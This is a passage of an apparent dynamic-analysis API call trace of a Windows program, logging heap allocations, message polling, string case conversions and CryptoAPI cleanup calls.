cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0207.252] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.252] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0207.252] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.252] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.252] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.252] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.252] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.252] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.253] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.253] CryptDestroyKey (hKey=0xaa5860) returned 1 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.253] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0207.253] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0207.253] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.253] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.254] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.254] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.254] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0207.254] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.254] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.254] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.254] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.254] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.255] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.255] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.255] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.255] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0207.255] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.256] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.256] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0207.256] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.256] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.256] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.256] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0207.257] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0207.257] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.257] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.257] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.257] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.258] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0207.258] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.258] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.258] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.258] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.258] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.258] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.259] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.259] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.259] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.259] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.259] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.259] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.260] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.260] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.260] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.260] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.260] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.260] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.261] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.261] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.261] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.261] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.261] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.261] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0207.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0207.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0207.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, 